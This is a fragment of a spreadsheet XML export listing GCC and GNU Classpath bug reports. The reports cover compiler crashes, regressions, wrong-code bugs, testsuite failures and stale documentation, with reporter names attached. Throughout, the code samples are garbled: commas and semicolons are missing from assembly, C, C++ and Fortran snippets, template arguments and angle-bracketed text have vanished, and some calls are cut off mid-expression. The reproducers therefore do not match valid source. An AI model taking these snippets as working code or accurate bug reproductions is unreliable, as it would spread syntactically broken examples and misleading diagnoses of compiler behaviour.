Generated code:
        .text
        .p2align 415
.globl g
        .type   g @function
g:
        pushl   %ebp
        movl    %esp %ebp
        subl    $8 %esp
        movl    8(%ebp) %eax
        movl    12(%ebp) %edx
        movl    %eax (%esp)
        movl    %edx 4(%esp)
        call    f
        xorl    %eax %eax
        leave
        ret
        .size   g .-g
Gcc 4.3 didn't generate stack frame in this case. On i386 spurious stack frame is especially bad because there are few registers and one register is lost for the stack frame. One my program doing heavy 64-bit math shows almost 1% code size increase because of these unneeded frames.</t>
  </si>
  <si>
    <t>GCC-58371</t>
  </si>
  <si>
    <t>[4.9 Regression] internal compiler error: in ipcp_verify_propagated_values at ipa-cp.c:892</t>
  </si>
  <si>
    <t>Created attachment 30774
z.cc
Fresh gcc trunk r202241 Linux x86_64
% $GCC_TRUNK/bin/g++ -w z.cc -c -O2 
z.cc:200:1: internal compiler error: in ipcp_verify_propagated_values at ipa-cp.c:892
 }
 ^
0xf20fb8 ipcp_verify_propagated_values()
        ../../gcc/gcc/ipa-cp.c:892
0xf2342d ipcp_propagate_stage                                                                                                                                                                       
        ../../gcc/gcc/ipa-cp.c:2255                                                                                                                                                                 
0xf2342d ipcp_driver                                                                                                                                                                                
        ../../gcc/gcc/ipa-cp.c:3600                                                                                                                                                                 
0xf2342d execute                                                                                                                                                                                    
        ../../gcc/gcc/ipa-cp.c:3698                                                                                                                                                                 
Test case attached (reduced from chromium sources).</t>
  </si>
  <si>
    <t>kcc</t>
  </si>
  <si>
    <t>GCC-41117</t>
  </si>
  <si>
    <t>spurious _gfortran_internal_pack (II)</t>
  </si>
  <si>
    <t>Another case of a spurious pack (which really affects performance unfortunately). 
&gt; cat test.f90
MODULE M1
CONTAINS
 SUBROUTINE S1(data)
   REAL DIMENSION(*) :: data
 END SUBROUTINE S1
END MODULE
SUBROUTINE S2
 REAL :: data(1010)
 DO i=110
    CALL S1(data(:i))
 ENDDO
 DO i=110
    CALL S1(data(1i))
 ENDDO
END SUBROUTINE S2
&gt; cat test.f90.003t.original
s1 (real(kind=4)[0:] * data)
{
  (void) 0
}
s2 ()
{
  real(kind=4) data[100]
  integer(kind=4) i
  i = 1
  if (i &lt;= 10)
    {
      while (1)
        {
          {
            logical(kind=4) D.1557
            {
              void * D.1554
              struct array1_real(kind=4) parm.0
              integer(kind=8) D.1543
              D.1543 = (integer(kind=8)) i
              parm.0.dtype = 281
              parm.0.dim[0].lbound = 1
              parm.0.dim[0].ubound = 10
              parm.0.dim[0].stride = 1
              parm.0.data = (void *) 
              parm.0.offset = -11
              D.1554 = _gfortran_internal_pack (
              s1 (D.1554)
              if ((real(kind=4)[0:] *) parm.0.data != (real(kind=4)[0:] *) D.1554)
                {
                  _gfortran_internal_unpack (
                  {
                    void * D.1555
                    D.1555 = D.1554
                    if (D.1555 != 0B)
                      {
                        __builtin_free (D.1555)
                      }
                  }
                }
            }
            L.1:
            D.1557 = i == 10
            i = i + 1
            if (D.1557) goto L.2
          }
        }
    }
  L.2:
  i = 1
  if (i &lt;= 10)
    {
      while (1)
        {
          {
            logical(kind=4) D.1560
            s1 (
            L.3:
            D.1560 = i == 10
            i = i + 1
            if (D.1560) goto L.4
          }
        }
    }
  L.4:
}</t>
  </si>
  <si>
    <t>CLASSPATH-36477</t>
  </si>
  <si>
    <t>OOME in CPStringBuilder when running Eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">When opening in Eclipse:
Help -&gt; About Eclipse SDK -&gt; Configuration Details
this OOME happens:
!SESSION 2008-06-09 16:47:58.807 -----------------------------------------------
eclipse.buildId=M20080221-1800
java.version=1.5.0
java.vendor=GNU Classpath
BootLoader constants: OS=linux ARCH=x86_64 WS=gtk NL=en_US
Command-line arguments:  -consoleLog -debug
!ENTRY org.eclipse.ui 4 0 2008-06-09 16:48:17.583
!MESSAGE Unhandled event loop exception
!STACK 0
java.lang.OutOfMemoryError
   at gnu.java.lang.CPStringBuilder.allocateArray(CPStringBuilder.java:1065)
   at gnu.java.lang.CPStringBuilder.ensureCapacity(CPStringBuilder.java:1051)
   at gnu.java.lang.CPStringBuilder.setLength(CPStringBuilder.java:208)
   at java.util.Properties.formatForOutput(Properties.java:573)
   at java.util.Properties.store(Properties.java:430)
   at org.eclipse.core.internal.preferences.PreferencesService.exportPreferences(PreferencesService.java:399)
   at org.eclipse.ui.internal.about.ConfigurationLogDefaultSection.appendUserPreferences(ConfigurationLogDefaultSection.java:168)
   at org.eclipse.ui.internal.about.ConfigurationLogDefaultSection.write(ConfigurationLogDefaultSection.java:57)
   at org.eclipse.ui.internal.dialogs.AboutSystemDialog.appendExtensions(AboutSystemDialog.java:172)
   at org.eclipse.ui.internal.dialogs.AboutSystemDialog.getSystemSummary(AboutSystemDialog.java:143)
   at org.eclipse.ui.internal.dialogs.AboutSystemDialog.createDialogArea(AboutSystemDialog.java:130)
</t>
  </si>
  <si>
    <t>twisti</t>
  </si>
  <si>
    <t>GCC-41027</t>
  </si>
  <si>
    <t>Missing warning from -Wc++-compat</t>
  </si>
  <si>
    <t>trying to build gcc for arm-eabi with --enable-build-with-cxx fails with 'structure 'key' with uninitialized const members'.  However a normal C-based bootstrap does not report this as a warning when -Wc++-compat is used.
struct f
{
  const int a
}
void g(struct f*)
void h ()
{
struct f h
g(
}</t>
  </si>
  <si>
    <t>GCC-40256</t>
  </si>
  <si>
    <t>Explicit function template call doesn't trigger Koenig lookup when it should</t>
  </si>
  <si>
    <t>14.8.1/6 says:
But when a function template with explicit template arguments is used the call does not have the correct syntactic form unless there is a function template with that name visible at the point of the call. If no such name is visible the call is not syntactically well-formed and argument-dependent lookup does not apply. If some such name is visible argument dependent lookup applies and additional  function templates may be found in other namespaces.
Then the following example is given which doesn't compile on GCC-4.3.3:
namespace A {
        struct B { }
        template void f(B)
}
namespace C {
        template void f(T t)
}
void g(A::B b) {
        // stripping out ill-formed cases
        using C::f
        f(b)                // well-formed because C::f is visible then
                                // A::f is found by argument dependent lookup
}
g++ doesn't compile it stating:
teste.cpp: In function 'void g(A::B)':
teste.cpp:12: error: no matching function for call to 'f(A::B&amp;)'
I haven't tested with 4.4 nor have found a similar bug.</t>
  </si>
  <si>
    <t>GCC-67079</t>
  </si>
  <si>
    <t>Webpages and manual still claim that C++11 support is experimental</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/onlinedocs/gcc/Standards.html#Standards (for version GCC 6) and https://gcc.gnu.org/onlinedocs/gcc-5.1.0/gcc/Standards.html#Standards
and https://gcc.gnu.org/projects/cxx0x.html
claim that C++11 support is still experimental when it has not been for a least a couple of releases and C++14 is going to be the default in GCC 6.
This is a source of confusion for users: https://mail.gnome.org/archives/gtkmm-list/2015-June/msg00008.html</t>
  </si>
  <si>
    <t>GCC-41701</t>
  </si>
  <si>
    <t>scan-assembler-not has false positives</t>
  </si>
  <si>
    <t>The scan-assembler-not should skip strings inside of .ident directives.  I have a branch that I use for power7 development power7-meissner.  In that branch I set the REVISION file to indicate that this is a branch.  Currently it is set to:
[ibm/power7-meissner mainline revision 152572]
This revision string gets put in the .ident section which causes the test gcc.dg/builtins-58.c to fail because it has the directive:
/* scan-assembler-not pow */
It is a minor thing but I'm sure somebody else will trigger it eventually.</t>
  </si>
  <si>
    <t>GCC-24369</t>
  </si>
  <si>
    <t>[4.0 only] segmentation fault with gfortran</t>
  </si>
  <si>
    <t>Using Debian sid
$uname -a
Linux kusumanchi 2.6.12-1-686-smp #1 SMP Tue Sep 27 13:10:31 JST 2005
i686 GNU/Linux
$gfortran -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v
--enable-languages=cc++javaf95objcadatreelang --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
--without-included-gettext --enable-threads=posix --enable-nls
--program-suffix=-4.0 --enable-__cxa_atexit
--enable-libstdcxx-allocator=mt --enable-clocale=gnu
--enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk
--enable-gtk-cairo
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre
--enable-mpfr --disable-werror --enable-checking=release
i486-linux-gnu
Thread model: posix
gcc version 4.0.2 (Debian 4.0.2-2)
$cat gfortran_bug.f90
module variables
 implicit none
 integer parameter :: NX = 32
 real :: xco(0:NX)
contains
!------------------------------------------------------------------------------
function func1(N)
 implicit none
 real :: func1(0:N)
 integer intent(in) :: N
 func1(:) = 1.0
end function func1
!------------------------------------------------------------------------------
function func2(N)
 implicit none
 real :: func2(0:N)
 integer intent(in) :: N
 func2(:) = 1.0 + func1(N)
end function func2
end module variables
!------------------------------------------------------------------------------
program testsuite
 use variables
 xco = func2(NX)
end program testsuite
$gfortran gfortran_bug.f90
$./a.out
Segmentation fault
I first reported the problem at http://gcc.gnu.org/ml/fortran/2005-10/msg00277.html from which I gather that this is not a problem with 4.1.0 20051010 (experimental) version. I am wondering if it could be fixed in 4.0.2 as well.
thanks
raju</t>
  </si>
  <si>
    <t>GCC-38085</t>
  </si>
  <si>
    <t>gcc -m64 -pg generates invalid assembler code on Solaris 10/x86</t>
  </si>
  <si>
    <t>gcc -m64 -pg always generates invalid assembler code on Solaris 10/x86:
int
main (void)
{
}
% ./xgcc -B./ -m64 -pg -c ptest.c
/var/tmp//cc4kvaG9.s: Assembler messages:
/var/tmp//cc4kvaG9.s:18: Error: junk `@' after expression
Line 18 of the output file is
        leaq    .LP0@(%rip)%r11
This happens both with gas 2.15 (/usr/ccs/bin/gas) and with gas 2.19.50 (CVS
version 2.19.50.20081009).
The bug has been present since the introduction of x86_64 profiling support by
this patch:
Fri Nov 15 14:54:19 CET 2002  Jan Hubicka  
	* i386-protos.h (x86_function_profiler): New function
	* i386.h (MCOUNT_NAME): New.
	(PROFILE_COUNT_REGISTER): New.
	(FUNCTION_PROFILER): Move offline to ...
	* i386.c (x86_function_profiler) ... here fix 64bit support
I have no idea what was intended here.</t>
  </si>
  <si>
    <t>GCC-4933</t>
  </si>
  <si>
    <t>tree_list not supported by dump_expr</t>
  </si>
  <si>
    <t>Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0.2/specs
Configured with: ../configure --with-as=/usr/local/bin/as --with-ld=/usr/local/b
in/ld
Thread model: posix
gcc version 3.0.2
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0.2/cpp0 -lang-c++ -D__GNUG__=3 -
D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNU
C_MINOR__=0 -D__GNUC_PATCHLEVEL__=2 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D_
_sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -As
ystem=unix -Asystem=svr4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500
 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -D__GCC_NEW_VARA
RGS__ -Acpu=sparc -Amachine=sparc commaprob.cpp commaprob.ii
GNU CPP version 3.0.2 (cpplib) (sparc)
ignoring nonexistent directory /usr/local/sparc-sun-solaris2.7/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/sparc-sun-solaris2.7
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0.2/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0.2/cc1plus -fpreprocessed commap
rob.ii -quiet -dumpbase commaprob.cpp -version -o commaprob.s
GNU CPP version 3.0.2 (cpplib) (sparc)
GNU C++ version 3.0.2 (sparc-sun-solaris2.7)
        compiled by GNU C version 3.0.2.
commaprob.cpp:65: sorry not implemented: `tree_list' not supported by
   dump_expr
commaprob.cpp:65: confused by earlier errors bailing out
Release:
gcc-3.0.2
Environment:
sparc-solaris-2.7
How-To-Repeat:
Compile the code</t>
  </si>
  <si>
    <t>anthwil</t>
  </si>
  <si>
    <t>GCC-2944</t>
  </si>
  <si>
    <t>gcc 2.95.3 internal compiler error on koffice</t>
  </si>
  <si>
    <t>mkab@brain:~/kde/koffice-1.1-beta2/kspread $ gcc -v -save-temps -DHAVE_CONFIG_H -I. -I. -I.. -I../lib/kofficeui -I../lib/kofficeui -I../lib/kofficecore -I../lib/kofficecore -I../lib/store -I../lib/store -I../lib/interfaces -I../lib/koscript -I../lib/koscript -I../interfaces -I/usr/local/kde/include -I/usr/local/qt/include -I/usr/X11R6/include -O2 -fno-exceptions -fno-check-new -DQT_CLEAN_NAMESPACE -DQT_NO_COMPAT -DQT_NO_ASCII_CAST -c kspread_locale.cc  -fPIC -DPIC -o .libs/kspread_locale.o
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.3/specs
gcc version 2.95.3 20010315 (release)
GNU CPP version 2.95.3 20010315 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 ..
 ../lib/kofficeui
 ../lib/kofficecore
 ../lib/store
 ../lib/koscript
 ../interfaces
 /usr/local/kde/include
 /usr/local/qt/include
 /usr/X11R6/include
 /usr/include/g++
 /usr/local/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.3/../../../../i686-pc-linux-gnu/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.3/cc1plus kspread_locale.ii -quiet -dumpbase kspread_locale.cc -O2 -version -fno-exceptions -fno-check-new -fPIC -o kspread_locale.s
GNU C++ version 2.95.3 20010315 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.3 20010315 (release).
kspread_locale.cc: In method `KSpreadLocale::KSpreadLocale()':
kspread_locale.cc:9: Internal compiler error.
kspread_locale.cc:9: Please submit a full bug report.
kspread_locale.cc:9: See  for instructions.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
Linux 2.4.4 Athlon 500Mhz 256MbRAM glibc 2.2.2 QT2.3.0 KDELIBS 2.1.2</t>
  </si>
  <si>
    <t>kabrianis</t>
  </si>
  <si>
    <t>GCC-3288</t>
  </si>
  <si>
    <t>Segmentation fault when building bootstrap (../../gcc/cp/decl.c:6636: Internal error: Segmentation Fault)</t>
  </si>
  <si>
    <t>stage2/xgcc -Bstage2/ -B/opt/FSFgcc3/sparc-sun-solaris2.5.1/bin/ -c  -DIN_GCC  -DSVR4  -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   -DHAVE_CONFIG_H -I. -Icp -I../../gcc -I../../gcc/cp -I../../gcc/config -I../../gcc/../include ../../gcc/cp/decl.c -o cp/decl.o
../../gcc/cp/decl.c: In function `init_decl_processing': 
../../gcc/cp/decl.c:6636: Internal error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [cp/decl.o] Error 1
make[2]: Leaving directory `/home/sdu/cel95eig/home/work/gcc/gcc-3.0/objdir/gcc'
make[1]: *** [stage3_build] Error 2
make[1]: Leaving directory `/home/sdu/cel95eig/home/work/gcc/gcc-3.0/objdir/gcc'
make: *** [bootstrap] Error 2
I've got full output from both configure and make if you want to see them...
Release:
3.0
Environment:
System: SunOS legolas 5.5.1 Generic_103640-27 sun4m sparc SUNWSPARCstation-10
Architecture: sun4
host: sparc-sun-solaris2.5.1
build: sparc-sun-solaris2.5.1
target: sparc-sun-solaris2.5.1
configured with: ../configure --prefix=/opt/FSFgcc3
How-To-Repeat:
 Compile it again...</t>
  </si>
  <si>
    <t>emil.isberg</t>
  </si>
  <si>
    <t>GCC-70650</t>
  </si>
  <si>
    <t>[6 regression] bootstrap failure: ICE  in emit_move_insn at expr.c:3546</t>
  </si>
  <si>
    <t>At r234969 the bootstrap of x86_64-apple-darwin15 fails with...
libtool: compile:  /sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/./gcc/xgcc -shared-libgcc -B/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/./gcc -nostdinc++ -L/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src -L/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src/.libs -L/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/libsupc++/.libs -B/sw/lib/gcc6/x86_64-apple-darwin15.5.0/bin/ -B/sw/lib/gcc6/x86_64-apple-darwin15.5.0/lib/ -isystem /sw/lib/gcc6/x86_64-apple-darwin15.5.0/include -isystem /sw/lib/gcc6/x86_64-apple-darwin15.5.0/sys-include -I/sw/src/fink.build/gcc6-6.0.0-1/gcc-6-20160413/libstdc++-v3/../libgcc -I/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/include/x86_64-apple-darwin15.5.0 -I/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/include -I/sw/src/fink.build/gcc6-6.0.0-1/gcc-6-20160413/libstdc++-v3/libsupc++ -I/sw/include -I/sw/include -std=gnu++11 -D_GLIBCXX_SHARED -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi -fdiagnostics-show-location=once -fvisibility-inlines-hidden -ffunction-sections -fdata-sections -frandom-seed=string-inst.lo -g -O2 -c ../../../../../gcc-6-20160413/libstdc++-v3/src/c++11/string-inst.cc  -fno-common -DPIC -D_GLIBCXX_SHARED -o string-inst.o
In file included from /sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/include/string:53:0
                 from ../../../../../gcc-6-20160413/libstdc++-v3/src/c++11/string-inst.cc:38:
/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/include/bits/basic_string.tcc: In member function â€˜void std::__cxx11::basic_string::_M_construct(_InIterator _InIterator std::forward_iterator_tag) [with _FwdIterator = char* _CharT = char _Traits = std::char_traits _Alloc = std::allocator]â€™:
/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/include/bits/basic_string.tcc:206:7: internal compiler error: in emit_move_insn at expr.c:3546
       basic_string::
       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Makefile:545: recipe for target 'string-inst.lo' failed
make[6]: *** [string-inst.lo] Error 1
make[6]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src/c++11'
Making all in filesystem
make[6]: Entering directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src/filesystem'
make[6]: Nothing to be done for 'all'.
make[6]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src/filesystem'
make[6]: Entering directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src'
make[6]: *** No rule to make target '../src/c++11/libc++11convenience.la' needed by 'libstdc++-symbols.explist'.  Stop.
make[6]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src'
Makefile:638: recipe for target 'all-recursive' failed
make[5]: *** [all-recursive] Error 1
make[5]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3/src'
Makefile:507: recipe for target 'all-recursive' failed
make[4]: *** [all-recursive] Error 1
make[4]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3'
Makefile:414: recipe for target 'all' failed
make[3]: *** [all] Error 2
make[3]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir/x86_64-apple-darwin15.5.0/libstdc++-v3'
Makefile:12290: recipe for target 'all-stage1-target-libstdc++-v3' failed
make[2]: *** [all-stage1-target-libstdc++-v3] Error 2
make[2]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir'
Makefile:21196: recipe for target 'stage1-bubble' failed
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory '/sw/src/fink.build/gcc6-6.0.0-1/darwin_objdir'
Makefile:21500: recipe for target 'bootstrap' failed
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-39124</t>
  </si>
  <si>
    <t>[4.4 Regression]: -fno-exceptions leads to a ICE</t>
  </si>
  <si>
    <t>{~/tmp}$g++ --version
g++ (GCC) 4.4.0 20090207 (experimental)
{~/tmp}$g++ -c PredicateSimplifier.cpp -O2 -fno-exceptions -funroll-loops
/svn/llvm/lib/Transforms/Scalar/PredicateSimplifier.cpp: In member function 'void::ValueRanges::applyRange(unsigned int const llvm::ConstantRange&amp; ::DomTreeDFS::Node* ::VRPSolver*)':
/svn/llvm/lib/Transforms/Scalar/PredicateSimplifier.cpp:1231: internal compiler error: in get_loop_body at cfgloop.c:816
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>linuxl4</t>
  </si>
  <si>
    <t>GCC-25196</t>
  </si>
  <si>
    <t>[4.0 Regression] i386: wrong arguments passed</t>
  </si>
  <si>
    <t>I really had a hard time tracking this down from a large program: gcc 4.0.2 on i386-linux sometimes passes wrong arguments.
Please try the attached source file on i386 with gcc-4.0.2 -march=i386 -O3 -fomit-frame-pointer.
When looking at the disassembly of f2() it seems that %edi is incorrectly used twice:
  5e:   89 f8                   mov    %edi%eax   !!!!!
  60:   ff 74 24 24             pushl  0x24(%esp)
  64:   55                      push   %ebp
  65:   89 f9                   mov    %edi%ecx   !!!!!
  67:   89 da                   mov    %ebx%edx
  69:   e8 92 ff ff ff          call   0 
This wrong-code bug is probably a 3.2 3.3 and 3.4 regression.
~Markus</t>
  </si>
  <si>
    <t>GCC-38221</t>
  </si>
  <si>
    <t>[4.3 Regression]FAIL: gcc.c-torture/compile/sync-3.c  -O0   (test for warnings line )</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/xgcc -B/mnt/gnu/gcc/objdir/gcc/   -O0
  -w -fno-show-column -c  -o sync-3.o /mnt/gnu/gcc/gcc/gcc/testsuite/gcc.c-tortu
re/compile/sync-3.c    (timeout = 300)
FAIL: gcc.c-torture/compile/sync-3.c  -O0   (test for warnings line )
PASS: gcc.c-torture/compile/sync-3.c  -O0  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-41384</t>
  </si>
  <si>
    <t>initialization failure of global const variable of template class which has a constructor initializing its member which is a pointer to member data when compiled with -O2</t>
  </si>
  <si>
    <t>I wrote the following code.
------ begin file haha.cc ---------------
struct C {
        int i
}
template 
struct A {
        A() : p(&amp;C::i) {}
        int C::*p
}
const A r
int main()
{
        return 0
}
------------ end file haha.cc -----------------
And I compiled it with -O2 switch. The exact compilation command given was:
$ g++ -O2 -Wall haha.cc
The compiler didn't produce any errors nor warnings. But when I ran the generated binary 'Segmentation fault' came up.
If you (1) make struct A a non-template class or (2) define r as non-const or (3) declare A::p as a normal pointer or (4) don't give -O2 switch it compiles and runs well.
The following is the output from 'gcc -v' command:
$ gcc -v
Reading specs from /usr/lib/gcc/x86_64-redhat-linux/3.4.6/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --host=x86_64-redhat-linux
Thread model: posix
gcc version 3.4.6 20060404 (Red Hat 3.4.6-10)</t>
  </si>
  <si>
    <t>kyusic</t>
  </si>
  <si>
    <t>GCC-29327</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/specifics_1.f90</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.2/objdir/gcc/testsuite/gfortran/../../gf
ortran -B/home/dave/gnu/gcc-4.2/objdir/gcc/testsuite/gfortran/../../ /home/dave/
gnu/gcc-4.2/gcc/gcc/testsuite/gfortran.dg/specifics_1.f90   -O0  -ff2c  -L/home/
dave/gnu/gcc-4.2/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.2/
objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.2/objdir/hppa-linux
/./libiberty  -lm   -o ./specifics_1.exe    (timeout = 300)
/tmp/ccQbN46K.o: In function `.LC82':
(.rodata+0x274): undefined reference to `f2c_specific__conjg_4'
/tmp/ccQbN46K.o: In function `.LC95':
(.rodata+0x28c): undefined reference to `f2c_specific__conjg_8'
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/tmp/ccQbN46K.o: In function `.LC82':
(.rodata+0x274): undefined reference to `f2c_specific__conjg_4'
/tmp/ccQbN46K.o: In function `.LC95':
(.rodata+0x28c): undefined reference to `f2c_specific__conjg_8'
collect2: ld returned 1 exit status
FAIL: gfortran.dg/specifics_1.f90  -O0  (test for excess errors)
Excess errors:
(.rodata+0x274): undefined reference to `f2c_specific__conjg_4'
(.rodata+0x28c): undefined reference to `f2c_specific__conjg_8'
Fails at all optimizations.
The references come in the following plabels:
        .align 4
.LC82:
        .word   P%f2c_specific__conjg_4
        .align 4
.LC95:
        .word   P%f2c_specific__conjg_8</t>
  </si>
  <si>
    <t>GCC-71581</t>
  </si>
  <si>
    <t>[5 Regression] ICE on valid code on x86_64-linux-gnu with -Wuninitialized (Segmentation fault)</t>
  </si>
  <si>
    <t>This is a regression. gcc-4.9 and gcc-4.8 do not ICE. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160618 (experimental) [trunk revision 237575] (GCC) 
$: 
$: gcc-trunk -c small.c -Wuninitialized
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: Segmentation fault
 }
 ^
0xbbb84f crash_signal
	../../gcc-source-trunk/gcc/toplev.c:335
0xdbe07f warn_uninit
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:140
0xdbe3fb warn_uninitialized_vars
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:197
0xdbe730 execute_early_warn_uninitialized
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2449
0xdbe730 execute
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2484
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$: 
$: gcc-trunk -c small.c 
$: 
$: cat small.c
_Complex long double fn1() {
  long double x
  return x
}
$:</t>
  </si>
  <si>
    <t>GCC-40813</t>
  </si>
  <si>
    <t>[4.4 regression] ICE in gsi_insert_seq_nodes_after at gimple-iterator.c:222</t>
  </si>
  <si>
    <t>seen while building openjdk-6 on sparc-linux-gnu with 4.4 branch. 4.3 branch does work.
  Matthias
g++-4.4 -c -fPIC -O1 -fno-strict-aliasing -fno-rtti -fno-exceptions -fcheck-new c1_MacroAssembler_sparc.ii
In file included from ../generated/incls/_assembler_pd.hpp.incl:2
                 from /home/doko/openjdk/openjdk-6-6b16~pre4/build/openjdk-ecj/hotspot/src/share/vm/asm/assembler.hpp:310
                 from ../generated/incls/_c1_MacroAssembler_sparc.cpp.incl:60
                 from /home/doko/openjdk/openjdk-6-6b16~pre4/build/openjdk-ecj/hotspot/src/cpu/sparc/vm/c1_MacroAssembler_sparc.cpp:27:
/home/doko/openjdk/openjdk-6-6b16~pre4/build/openjdk-ecj/hotspot/src/cpu/sparc/vm/assembler_sparc.hpp: In constructor â€˜Address::Address(RegisterImpl* unsigned char* relocInfo::relocType)â€™:
/home/doko/openjdk/openjdk-6-6b16~pre4/build/openjdk-ecj/hotspot/src/cpu/sparc/vm/assembler_sparc.hpp:302: internal compiler error: in gsi_insert_seq_nodes_after at gimple-iterator.c:222
Please submit a full bug report
with preprocessed source if appropriate.
building with -O0 or omitting -fcheck-new avoids the ICE.</t>
  </si>
  <si>
    <t>GCC-6800</t>
  </si>
  <si>
    <t>bad warnings for flexible arrays</t>
  </si>
  <si>
    <t>Operations such as __typeof__(f-&gt;bar) warn
when the 'bar' member of 'f' is a flexible
array.
See attachment source it warns:
? gcc -c -o flex.o flex.c
flex.c: In function `bar':
flex.c:8: array initialized from non-constant array expression
flex.c:8: storage size of `b' isn't known
Release:
3.1
Environment:
sparc-unknown-linux
How-To-Repeat:
gcc -c -o flex.o flex.c</t>
  </si>
  <si>
    <t>GCC-5588</t>
  </si>
  <si>
    <t>g++ g77 and objc testsuite problems with multiple ABIs</t>
  </si>
  <si>
    <t>This is a rehash of:
 - http://gcc.gnu.org/ml/gcc-bugs/2000-11/msg00463.html
 - http://gcc.gnu.org/ml/gcc-patches/2000-11/msg01537.html
This should be fixed for 3.1 (and maybe 3.0 too)
Since November 2000 the g++ testsuite has not run 
correctly when multiple ABIs are tested.  Similar problems
exist for the g77 and objc testsuites.
The following work:
runtest --tool g++ 
runtest --tool g++ --target_board unix
